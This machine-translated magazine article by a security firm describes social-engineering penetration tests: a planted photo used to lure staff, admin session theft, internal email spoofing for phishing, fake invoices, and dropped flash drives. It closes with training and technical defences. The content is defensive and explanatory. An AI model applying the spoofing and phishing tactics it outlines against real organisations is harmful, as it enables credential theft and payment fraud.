Lie to me if you can: features of conducting a sociotechnical pentest
Imagine this situation. Cold October morning, design institute in the regional center of one of the regions of Russia. Someone from the personnel department goes to one of the job pages on the institute’s website, posted a couple of days ago, and sees a photograph of a cat there. Morning quickly ceases to be boring …
In this article, Pavel Suprunyuk, technical director of the Group-IB Audit and Consulting Department, talks about the place that social engineering attacks occupy in practical security assessment projects, what unusual forms they can take, and how to protect themselves from such attacks. The author clarifies that the article is of an overview nature, however, if some aspect is of interest to readers, Group-IB experts will readily answer questions in the comments.
Part 1. Why so serious?
Let’s get back to our cat. After a while, the personnel department deletes the photo (screenshots here and below are partially retouched so as not to reveal real names), but it stubbornly returns, it is deleted again, and this happens several more times. The personnel department understands that the cat has the most serious intentions, he does not want to leave, and they call for help from a web programmer – the person who made the site and understands it, and now administers it. The programmer visits the site, once again removes the annoying cat, reveals that it was placed on behalf of the personnel department itself, then makes the assumption that the personnel department password has leaked to some network hooligans and changes it. The cat no longer appears.
What really happened? Regarding the group of companies where the institute belonged, Group-IB specialists conducted penetration testing in a format close to Red Teaming (in other words, this is an imitation of targeted attacks on your company using the most advanced methods and tools from the arsenal of hacker groups). We talked in detail about Red Teaming here. It is important to know that when conducting such a test, a very wide range of attacks from pre-agreed ones, including social engineering, can be used. It is clear that the very placement of the cat was not the ultimate goal of what is happening. And there was the following:
- The Institute’s website was hosted on a server on the Institute’s network itself, and not on third-party servers;
- found leak of the personnel department account (message log file in the root of the site). It was impossible to administer the site with this account, but it was possible to edit the job pages;
- With the stolen identifier of the administrator’s session, one could get full access to the site, place executable pages in the PHP language, and therefore, get access to the server’s operating system, and then to the local network itself, which was an important intermediate goal of the project.
The attack ended in partial success – the administrator session identifier was stolen, but it was tied to an IP address. We could not get around this, we could not increase the privileges on the site to administrator’s, but we improved our mood. The final result was ultimately obtained on another part of the network perimeter.
Part 2. I am writing to you – what’s more? And I’m calling and stomping around in your office, dropping flash drives
What happened in the situation with the cat is an example of social engineering, albeit not quite classical. Actually, there were more events in this story: there was a cat, and an institute, and a personnel department, and a programmer, but there were also emails with clarifying questions that supposedly were written by “candidates” to the personnel department itself and to the programmer personally in order to provoke them go to the site page.
Speaking of letters. Ordinary email – probably the main vehicle for carrying out social engineering – has not lost its relevance for a couple of decades and sometimes leads to the most unusual consequences.
We often tell the following story at our events, as it is very revealing.
Usually, based on the results of projects with social engineering, we compile statistics, which, as you know, are dry and boring. So many percent of the recipients opened the attachment from the letter, so many followed the link, but these three generally entered their username and password. In one project, we received more than 100% of the password input – that is, it turned out more than we sent out.
It happened like this: a phishing email was sent, supposedly from the CISO state corporation, demanding “to urgently test changes in the mail service”. The letter fell on the head of a large unit that was engaged in technical support. The leader was very diligent in the execution of orders from the high authorities and sent it to all subordinates. The call center itself was quite large. In general, situations when someone sends “interesting” phishing emails to their colleagues and they also come across are quite common. For us, this is the best feedback on the quality of writing a letter.
A bit later we got to the core (the letter was withdrawn in a compromised mailbox):
This success of the attack was caused by the fact that the mailing list used a number of technical flaws in the client’s mail system. It was configured in such a way that it was possible to send any letters on behalf of any sender of the organization itself without authorization, even from the Internet. That is, you could pretend to be CISO, or the head of technical support, or someone else. Moreover, the mail interface, observing letters from “its own” domain, carefully substituted a photograph from the address book, which added naturalness to the sender.
In truth, such an attack does not apply to particularly sophisticated technologies; it is a successful operation of a very basic flaw in mail settings. She regularly understands specialized IT and information security resources, but nonetheless, companies with all this are still found. Since no one is inclined to thoroughly check the service headers of the SMTP mail protocol, the message is usually checked for “danger” by warning mail interface icons that do not always reflect the whole picture.
Interestingly, this vulnerability works in a different direction: an attacker can send an email on behalf of your company to an external recipient. For example, he can fake a bill for regular payment on your behalf by specifying others instead of your details. If you do not consider the issues of antifraud and cashing in, this is probably one of the easiest ways to steal money using social engineering.
In addition to stealing passwords through phishing, a classic of sociotechnical attacks is the distribution of executable attachments. If these investments overcome all the remedies that modern companies usually have a lot of, a remote access channel to the victim’s computer will be formed. To demonstrate the consequences of an attack, the resulting remote control can be developed up to access to sensitive sensitive information. It is noteworthy that the vast majority of attacks that scare everyone in the media begin exactly this way.
In our audit department, for the sake of interest, we consider approximate statistics: what is the total value of the assets of companies to which we obtained access at the level of “Domain Administrator” mainly due to phishing and mailing of executed investments? This year it reached approximately 150 billion euros.
It is clear that sending out provocative emails and posting photographs of cats on websites are not the only ways of social engineering. In these examples, we tried to show the diversity of attack forms and their consequences. In addition to letters, a potential attacker can make calls to get the necessary information, scatter media (for example, flash drives) with executable files in the office of the target company, get a job as an intern, gain physical access to the local network under the guise of a CCTV camera installer. All this, by the way, are examples from our successfully completed projects.
Part 3. Doctrine is light, and unlearned is darkness
A reasonable question arises: well, there is social engineering, it looks dangerous, but what should companies do with all this? Captain hurries to help. Evidence: you need to defend yourself, and in a comprehensive manner. Some of the protection will be aimed at security measures that have already become classic, such as technical means of information protection, monitoring, organizational and legal support of processes, but the main part, in our opinion, should be directed to direct work with employees as the weakest link. After all, no matter how much you strengthen the technique, or write harsh regulations, there will always be a user who will open a new way to break everything. Moreover, neither regulations, nor equipment will keep pace with the flight of the user’s creativity, especially if a qualified attacker tells him.
First of all, it is important to educate the user: to explain that even in his routine work, situations related to social engineering may arise. For our customers we often carry out courses on digital hygiene – an event that teaches basic skills to counter attacks in general.
I can add that one of the best protection measures will not be memorization of information security rules, but a slightly detached assessment of the situation:
- Who is my interlocutor?
- Where did his offer or request come from (it never happened before, and now it appears)?
- What is unusual about this query?
Even an unusual type of letter font or a speech style unusual for the sender can trigger a chain of doubt that will stop the attack. The prescribed instructions are also needed, but they work differently, while they cannot specify all possible situations. For example, IS administrators write to them that you cannot enter your password on third-party resources. And if the password asks “your”, “corporate” network resource? The user thinks: “There are already two dozen services with a single account in our company, why not another one appear?” Another rule follows from this: a well-organized workflow also directly affects security: if a neighboring department may request information from you only in writing and only through your leader, a person “from a trusted partner of the company” will not be able to request it by phone — it will be nonsense for you. It is especially worthwhile to be wary if your interlocutor demands to do everything right now, or “ASAP”, as it is fashionable to write. Even in normal work, such a situation is often not healthy, and in the conditions of possible attacks it is a strong trigger. No time to explain, run my file!
We notice that users, as legends for a sociotechnical attack, are always subject to topics related to money in one form or another: the promise of promotions, preferences, gifts, as well as information allegedly made by local gossip and intrigue. In other words, the banal “mortal sins” work: a thirst for profit, greed and excessive curiosity.
Good training should always include practice. Here, penetration testing experts can come to the rescue. The next question: what and how will we test? We at Group-IB offer the following approach – immediately select the focus of testing: either evaluate the readiness for attacks only by the users themselves, or check the security of the company as a whole. And to test using social engineering methods, simulating real attacks – that is, with the same phishing, sending out executable documents, calls and other techniques.
In the first case, the attack is carefully prepared together with the customer’s representatives, mainly with its IT and information security specialists. Legends, tools and attack techniques are consistent. The customer himself provides focus groups and user lists for the attack, which include all the necessary contacts. Exceptions are created on the means of protection, since messages and executable loads must necessarily reach the recipient, because in such a project, only the reaction of people is of interest. Optionally, you can put markers into the attack, according to which the user can guess that this is the attack – for example, you can make a couple of spelling errors in messages or leave inaccuracies in copying the corporate identity. At the end of the project, we get the very “dry statistics”: which focus groups and to what extent reacted to the scenarios.
In the second case, the attack is carried out with zero initial knowledge, the “black box” method. We independently collect information about the company, its employees, the network perimeter, create legends for attacks, select methods, look for possible defenses used in the target company, adapt tools, and write scripts. Our experts use both classic open-source intelligence methods (OSINT) and Group-IB’s own-developed product – Threat Intelligence, a system that, when preparing for phishing, can act as an aggregator of information about a company over a long period, including using classified information . Of course, so that the attack does not become an unpleasant surprise, its details are also consistent with the customer. It turns out a full-fledged penetration test, but it will be based on advanced social engineering. A logical option in this case is the development of an attack within the network, up to obtaining the highest rights in internal systems. By the way, in a similar way we use sociotechnical attacks in Red teaming, and in some penetration tests. As a result, the customer will receive an independent comprehensive vision of their security against a certain type of sociotechnical attacks, as well as a demonstration of the effectiveness (or, conversely, inefficiency) of the built line of defense against external threats.
We recommend such training at least twice a year. Firstly, any company has a staff turnover and previous experience is gradually forgotten by employees. Secondly, the methods and techniques of attacks are constantly changing and this leads to the need to adapt security processes and defenses.
If we talk about technical measures to protect against attacks, the following help to the greatest extent:
- The presence of mandatory two-factor authentication on services that are published on the Internet. To release such services in 2019 without Single Sign On systems, without password protection and two-factor authentication in a company with a size of several hundred people is tantamount to an open “break me” call. Properly implemented protection will make the quick use of stolen passwords impossible and will give time to eliminate the consequences of a phishing attack.
- Monitoring access control, minimizing user rights in systems and following the guidelines for the safe configuration of products that are released by every major manufacturer. These are often simple in nature, but very effective and difficult to implement in practice measures that everyone to one degree or another neglected for the sake of speed. And some are so necessary that without them no remedy can save.
- Well-built email filtering line. Antispam, total scan of attachments for malicious code, including dynamic testing through sandboxes. A well-prepared attack implies that an executable attachment will not be detected by antivirus tools. The sandbox, on the contrary, will check everything on itself, using files in the same way as people use them. As a result, a possible malicious component will be revealed by the changes made inside the sandbox.
- Means of protection against targeted attacks. As already noted, classic anti-virus tools will not detect malicious files in a well-prepared attack. The most advanced products should automatically monitor the set of events occurring on the network – both at the individual host level and at the level of traffic within the network. In the case of attacks, very characteristic chains of events appear that can be tracked and stopped if you have this kind of monitoring focused on events.
Original article published in the journal Information Security / Information Security # 6, 2019.